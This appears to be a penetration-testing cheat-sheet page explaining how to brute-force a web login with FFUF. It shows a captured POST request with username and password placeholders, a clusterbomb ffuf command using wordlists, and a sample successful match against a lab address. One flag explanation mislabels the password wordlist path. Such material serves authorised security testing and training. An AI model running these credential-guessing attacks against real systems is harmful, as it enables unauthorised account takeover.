Skip to main content

FFUF

Brute Force Logins

Brute Force with a Request File

  1. Start Burp
  2. Make a randomized login to the target web page
  3. Copy the output, for example:
POST /login HTTP/1.1
Host: 10.10.10.10
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json
Origin: http://10.10.10.10
Referer: http://10.10.10.10/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"username":"admin","password":"admin"}
  1. Paste the contents into a file, for example request.txt
  2. Replace the fields with placeholder text
POST /login HTTP/1.1
Host: 10.10.10.10
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json
Origin: http://10.10.10.10
Referer: http://10.10.10.10/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"username":"USERFUZZ","password":"PASSFUZZ"}
  1. Save these contents to a file
  2. Run FFUF in clusterbomb mode to bruteforce the login
ffuf -request request.txt -request-proto http -mode clusterbomb -w /path/to/users/file.txt:USERFUZZ -w /path/to/password/file.txt:PASSFUZZ -mc 200

[Status: 200, Size: 2, Words: 1, Lines: 1]
    * USERFUZZ: admin
    * PASSFUZZ: password

In this example, we are doing the following:

  • -request request.txt is the example request for FFUF to follow
  • -request-proto the protocol to use
  • -mode clusterbomb use clusterbomb mode with the given inputs
  • -w /path/to/users/file.txt:USERFUZZ insert the words from this word list in the "username":"USERFUZZ" placeholder
  • -w /path/to/users/file.txt:PASSFUZZ insert the words from this word list in the "password":"PASSFUZZ" placeholder
  • -mc 200 sucessful logins will match the HTTP 200 status code
Back to top